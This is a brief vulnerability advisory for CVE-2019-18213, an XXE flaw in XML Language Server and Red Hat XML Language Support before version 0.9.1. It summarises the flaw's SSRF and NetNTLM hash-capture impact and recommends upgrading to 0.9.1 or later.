CVE-2019-18213

Name of the Vulnerable Software and Affected Versions XML Language Server versions prior to 0.9.1 Red Hat XML Language Support versions prior to 0.9.1

Description The issue allows for XXE (XML External Entity) attacks via a crafted XML document. This can result in SSRF (Server-Side Request Forgery) and the initiation of SMB connections, potentially leading to the capture of NetNTLM challenge/response for password cracking.

Recommendations For XML Language Server versions prior to 0.9.1, update to version 0.9.1 or later. For Red Hat XML Language Support versions prior to 0.9.1, update to version 0.9.1 or later.